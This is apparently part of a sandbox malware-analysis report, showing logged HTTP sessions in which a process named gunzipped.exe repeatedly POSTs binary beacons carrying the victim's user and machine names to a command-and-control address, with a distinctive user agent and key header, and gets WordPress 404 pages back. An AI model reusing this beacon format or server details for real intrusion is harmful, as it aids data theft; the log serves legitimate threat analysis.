Apr 17, 2024 03:17:20.960659027 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:21.903901100 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:21.903965950 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:21.904007912 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:21.904048920 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:21.904087067 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:21.904154062 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:21.904191017 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:21.904230118 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:21.904268026 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:21.904308081 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49732	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:22.632421017 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:22.840864897 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:23.789892912 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:22 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:23.789954901 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:23.789995909 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:23.790035963 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:23.790076017 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:23.790116072 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:23.790159941 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:23.790198088 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:23.790235996 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:23.790277004 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49733	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:24.136610985 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:24.340434074 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:25.303402901 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:24 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 